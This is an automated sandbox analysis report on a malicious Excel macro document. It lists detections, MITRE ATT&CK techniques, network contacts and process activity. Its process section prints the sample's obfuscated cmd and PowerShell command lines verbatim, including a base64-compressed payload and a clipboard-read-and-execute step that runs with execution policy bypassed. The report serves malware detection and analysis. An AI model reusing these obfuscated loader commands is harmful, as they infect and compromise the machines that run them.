Play interactive tour

Edit tour

Analysis Report 20310_011_11353_0_88.xls

Overview

General Information

Joe Sandbox Version:	25.0.0 Tiger's Eye
Analysis ID:	740517
Start date:	13.12.2018
Start time:	21:39:19
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 3m 40s
Localized Internet Anonymization:	Successful Pool ID 'Italy'
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	20310_011_11353_0_88.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled HDC enabled GSI enabled (VBA)
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.expl.evad.winXLS@13/18@1/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	84	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control
Valid Accounts	Command-Line Interface21	Winlogon Helper DLL	Process Injection1	Disabling Security Tools1	Credential Dumping	Process Discovery1	Application Deployment Software	Clipboard Data1	Data Encrypted1	Standard Non-Application Layer Protocol2
Replication Through Removable Media	PowerShell2	Port Monitors	Accessibility Features	Process Injection1	Network Sniffing	Security Software Discovery1	Remote Services	Data from Removable Media	Exfiltration Over Other Network Medium	Standard Application Layer Protocol2
Drive-by Compromise	Scripting12	Accessibility Features	Path Interception	Deobfuscate/Decode Files or Information1	Input Capture	Remote System Discovery1	Windows Remote Management	Data from Network Shared Drive	Automated Exfiltration	Custom Cryptographic Protocol
Exploit Public-Facing Application	Exploitation for Client Execution13	System Firmware	DLL Search Order Hijacking	Scripting12	Credentials in Files	File and Directory Discovery1	Logon Scripts	Input Capture	Data Encrypted	Multiband Communication
Spearphishing Link	Command-Line Interface	Shortcut Modification	File System Permissions Weakness	Obfuscated Files or Information1	Account Manipulation	System Information Discovery21	Shared Webroot	Data Staged	Scheduled Transfer	Standard Cryptographic Protocol

Signature Overview

Click to jump to signature section

AV Detection:

Antivirus detection for submitted file

Show sources

Source: 20310_011_11353_0_88.xls

Avira: Label: VBA/Dldr.Agent.yogrg

Multi AV Scanner detection for submitted file

Show sources

Source: 20310_011_11353_0_88.xls

virustotal: Detection: 22%

Perma Link

Yara signature match

Show sources

Source: 00000006.00000002.1249360856.012C0000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000002.1249342410.006B0000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000008.00000002.1264839354.01CC0000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000000.1248635443.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000003.1249027719.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000008.00000002.1263643081.01290000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000008.00000002.1263634948.01287000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000000.1248720839.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000000.1248969895.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000008.00000002.1263500876.00400000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000008.00000002.1263628810.01280000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000000.1248315695.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000002.1249262618.00340000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000008.00000002.1264845731.01CC7000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Spreading:

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\cmd.exe

Jump to behavior

Potential document exploit detected (performs DNS queries)

Show sources

Source: global traffic

DNS query: name: images2.imgbox.com

Potential document exploit detected (performs HTTP gets)

Show sources

Source: global traffic

TCP traffic: 192.168.1.81:49211 -> 64.210.135.68:443

Potential document exploit detected (unknown TCP traffic)

Show sources

Source: global traffic

TCP traffic: 192.168.1.81:49211 -> 64.210.135.68:443

Networking:

IP address seen in connection with other malware

Show sources

Source: Joe Sandbox View

IP Address: 64.210.135.68 64.210.135.68

Found strings which match to known social media urls

Show sources

Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp	String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp	String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: images2.imgbox.com

Urls found in memory or binary data

Show sources

Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl0
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com0#
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000008.00000002.1264881981.01D0F000.00000004.sdmp	String found in binary or memory: https://i.imgur.com/Hz99iZp.png
Source: powershell.exe, 00000008.00000002.1264881981.01D0F000.00000004.sdmp	String found in binary or memory: https://images2.imgbox.com
Source: powershell.exe, 00000008.00000002.1262983725.00108000.00000004.sdmp	String found in binary or memory: https://images2.imgbox.com/43/d7/RDjs3JCK_o.png
Source: powershell.exe, 00000008.00000002.1264881981.01D0F000.00000004.sdmp	String found in binary or memory: https://images2.imgbox.com/43/d7/RDjs3JCK_o.pngH
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49211
Source: unknown	Network traffic detected: HTTP traffic on port 49211 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a window with clipboard capturing capabilities

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary:

Powershell connects to network

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Network Connect: 64.210.135.68 443

Jump to behavior

Very long command line found

Show sources

Source: unknown	Process created: Commandline size = 7783
Source: unknown	Process created: Commandline size = 2530
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: Commandline size = 7783	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2530	Jump to behavior

Creates mutexes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\2\BaseNamedObjects\Global\.net clr networking

Document contains an embedded VBA macro which executes code when the document is opened / closed

Show sources

Source: 20310_011_11353_0_88.xls	OLE, VBA macro line: Sub Workbook_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open			Name: Workbook_Open

Document contains embedded VBA macros

Show sources

Source: 20310_011_11353_0_88.xls

OLE indicator, VBA macros: true

Reads the hosts file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Classification label

Show sources

Source: classification engine

Classification label: mal84.expl.evad.winXLS@13/18@1/1

Creates files inside the user directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Roaming\Microsoft\Excel

Jump to behavior

Creates temporary files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user~1\AppData\Local\Temp\CVR1594.tmp

Jump to behavior

Document contains an OLE Workbook stream indicating a Microsoft Excel file

Show sources

Source: 20310_011_11353_0_88.xls

OLE indicator, Workbook stream: true

Parts of this applications are using the .NET runtime (Probably coded in C#)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Reads ini files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Show sources

Source: C:\Windows\System32\clip.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Sample is known by Antivirus

Show sources

Source: 20310_011_11353_0_88.xls

virustotal: Detection: 22%

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe CmD /V:ON/C 'set 7T=oMPResSIoNmODe]::''D`EcO`Mpr`&&set fXO9=`m`pR&&set lM='Uauer5J/QU&&set OJo=3rTzG&&set J3=t',(\''{0}&&set du4k=jNexb&&set xCZA=Ii'') } ^^^^^^^^&&set dq=IUjPSU&&set PF=qQeg9FrB&&set 7w=''&&set 54K=\''( )) ) ; [Sy&&set Jx19=UsJo7','4d7&&set 6jA=`&&set q3FQ=-nO&&set wFhV=keacV&&set Op=0}\'' -&&set FI=8}{6}&&set p5=r`eadt&&set a3=Rd3b1&&set MZ=`Home}[&&set 3mr=f 'dd-T',&&set KGUu=pZragUZRw9kIMJM','nf6yvfeRHwys&&set g9R=DDTwyngbQW6fTbNBM9T6eN3+Vxy'&&set sGDZ=FOv&&set 34f=SSiO&&set 3kP=UNemw2mO&&set M76=SUw2&&set jvc=i6Wr0yJa+CgVQ64wlYgUsz&&set qXy=VB&&set 87kx=oJOLevLKG&&set mti=6&&set md=NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5&&set W39h=11Hy&&set fQN=oM2&&set Igd=-f'yp','e',( \''{1}{&&set qK=Ro5A5SnpE3C/') &&set vJIZ=oBjECT') &&set Vkgt=ki6','U+ZEre4WJW&&set AXSR=','R','eaCH') {.(''{0}{1}{2}''-f 'n&&set ksNm=SMUVYAd&&set dn=ld0v',&&set M3hU=stem.Windows&&set kmP='k',&&set 6x=FFQB2enJqIYc&&set 6In=IBG','&&set KcOP=)&&set wpf='A' ) ) -As ( \''{3}{1}{0}{4}{2}\'' -f 'nt
Source: unknown	Process created: C:\Windows\System32\cmd.exe Cmd /C %QJi:''='%
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EcHO/^&( ${pS`h`OmE}[4]+${PS`Home}[34]+'x')( .('{1}{0}{2}'-f 'oB','neW-','jECT') IO.CO`m`pRE`sSION`.`deFL`AteSTrE`AM( [SYStem.io.MEMorYSTREam][sYStem.COnverT]::'F`R`o`MBAse`64StrinG'(('{22}{44}{11}{0}{47}{33}{30}{1}{34}{50}{4}{46}{31}{18}{6}{32}{26}{38}{41}{15}{13}{27}{48}{16}{36}{39}{49}{7}{51}{5}{20}{8}{3}{23}{17}{35}{14}{25}{21}{28}{37}{40}{12}{24}{2}{42}{19}{45}{43}{29}{9}{10}' -f 't2pO','xL1w032cbzqQeg9FrBc','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn','bEld0v','SISLxsB+i0VNzgIu9Pt7eBk+sR8Ei7goBMSUw2hCdAfH4pl9','k','K5AY3vQIdfy+fA3bUz/PhrPc+BeNlKIqoxmnaJFAmCFN0OlKbye8RGJGLLoPE1NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5BwJ','sjp6c11','PFd/L/Ubl5RXjtuuTLR','0Lv6Lw==','1KqmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+efrqnAUABd+h0nPdJvf7SHLdXzlH5AiqodnkybHbbbrHQbYcFAGfmhTt/WAKoZjvt5XsB/HYzfPUPs5JaAFW','5T8EDISyqRylxGVJpP643rTzGRN3RKBBV9ZXsjbAx8rLFmNS1blIorpYOOdplN65rKj9HhxiqChyuKIYQSiCGLkcB','UGUi6LRcf487TKv0QauRlD9be1uKluCbCLFi5BuJ7+F','xvUjxSnmSUbRKm/4PD4PQzEJFZG'
Source: unknown	Process created: C:\Windows\System32\clip.exe cLiP
Source: unknown	Process created: C:\Windows\System32\cmd.exe cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CmD /V:ON/C 'set 7T=oMPResSIoNmODe]::''D`EcO`Mpr`&&set fXO9=`m`pR&&set lM='Uauer5J/QU&&set OJo=3rTzG&&set J3=t',(\''{0}&&set du4k=jNexb&&set xCZA=Ii'') } ^^^^^^^^&&set dq=IUjPSU&&set PF=qQeg9FrB&&set 7w=''&&set 54K=\''( )) ) ; [Sy&&set Jx19=UsJo7','4d7&&set 6jA=`&&set q3FQ=-nO&&set wFhV=keacV&&set Op=0}\'' -&&set FI=8}{6}&&set p5=r`eadt&&set a3=Rd3b1&&set MZ=`Home}[&&set 3mr=f 'dd-T',&&set KGUu=pZragUZRw9kIMJM','nf6yvfeRHwys&&set g9R=DDTwyngbQW6fTbNBM9T6eN3+Vxy'&&set sGDZ=FOv&&set 34f=SSiO&&set 3kP=UNemw2mO&&set M76=SUw2&&set jvc=i6Wr0yJa+CgVQ64wlYgUsz&&set qXy=VB&&set 87kx=oJOLevLKG&&set mti=6&&set md=NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5&&set W39h=11Hy&&set fQN=oM2&&set Igd=-f'yp','e',( \''{1}{&&set qK=Ro5A5SnpE3C/') &&set vJIZ=oBjECT') &&set Vkgt=ki6','U+ZEre4WJW&&set AXSR=','R','eaCH') {.(''{0}{1}{2}''-f 'n&&set ksNm=SMUVYAd&&set dn=ld0v',&&set M3hU=stem.Windows&&set kmP='k',&&set 6x=FFQB2enJqIYc&&set 6In=IBG','&&set KcOP=)&&set wpf='A' ) ) -As ( \''{3}{1}{0}{4}{2}\'' -f 'nt	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe Cmd /C %QJi:''='%	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EcHO/^&( ${pS`h`OmE}[4]+${PS`Home}[34]+'x')( .('{1}{0}{2}'-f 'oB','neW-','jECT') IO.CO`m`pRE`sSION`.`deFL`AteSTrE`AM( [SYStem.io.MEMorYSTREam][sYStem.COnverT]::'F`R`o`MBAse`64StrinG'(('{22}{44}{11}{0}{47}{33}{30}{1}{34}{50}{4}{46}{31}{18}{6}{32}{26}{38}{41}{15}{13}{27}{48}{16}{36}{39}{49}{7}{51}{5}{20}{8}{3}{23}{17}{35}{14}{25}{21}{28}{37}{40}{12}{24}{2}{42}{19}{45}{43}{29}{9}{10}' -f 't2pO','xL1w032cbzqQeg9FrBc','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn','bEld0v','SISLxsB+i0VNzgIu9Pt7eBk+sR8Ei7goBMSUw2hCdAfH4pl9','k','K5AY3vQIdfy+fA3bUz/PhrPc+BeNlKIqoxmnaJFAmCFN0OlKbye8RGJGLLoPE1NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5BwJ','sjp6c11','PFd/L/Ubl5RXjtuuTLR','0Lv6Lw==','1KqmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+efrqnAUABd+h0nPdJvf7SHLdXzlH5AiqodnkybHbbbrHQbYcFAGfmhTt/WAKoZjvt5XsB/HYzfPUPs5JaAFW','5T8EDISyqRylxGVJpP643rTzGRN3RKBBV9ZXsjbAx8rLFmNS1blIorpYOOdplN65rKj9HhxiqChyuKIYQSiCGLkcB','UGUi6LRcf487TKv0QauRlD9be1uKluCbCLFi5BuJ7+F','xvUjxSnmSUbRKm/4PD4PQzEJFZG'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\clip.exe cLiP	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )	Jump to behavior

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32

Jump to behavior

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:

Binary string: mscorrc.pdb source: powershell.exe, 00000008.00000002.1275888570.040D0000.00000002.sdmp

Document has a 'lastprinted' value indicative of goodware

Show sources

Source: 20310_011_11353_0_88.xls

Initial sample: OLE summary lastprinted = 2014-11-21 11:09:31

Data Obfuscation:

Document contains an embedded VBA with many string operations indicating source code obfuscation

Show sources

Source: 20310_011_11353_0_88.xls

Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : High number of string operations

Obfuscated command line found

Show sources

